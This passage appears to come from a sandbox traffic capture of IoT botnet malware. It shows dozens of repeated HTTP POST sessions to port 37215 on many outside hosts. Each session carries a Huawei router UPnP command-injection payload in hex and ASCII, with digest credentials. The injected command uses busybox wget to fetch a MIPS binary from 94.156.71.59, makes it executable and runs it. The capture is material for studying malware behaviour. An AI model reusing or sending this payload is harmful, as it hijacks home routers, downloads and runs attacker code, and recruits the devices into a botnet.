2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            643192.168.2.1354566156.84.42.3337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.495899916 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            644192.168.2.1344582197.62.0.21537215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.496644974 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            645192.168.2.1358434197.149.87.7337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.497343063 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            646192.168.2.1349488156.64.75.2737215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.498090982 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            647192.168.2.1347358197.25.178.3837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.498785973 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            648192.168.2.135164241.186.51.9037215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.499468088 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            649192.168.2.1343270156.241.169.4837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.500161886 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            650192.168.2.1334050156.155.61.23937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.500886917 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            651192.168.2.135854841.114.65.837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.501600027 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            652192.168.2.1351694197.235.58.22337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.502250910 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            653192.168.2.134624041.185.155.4037215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.502931118 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
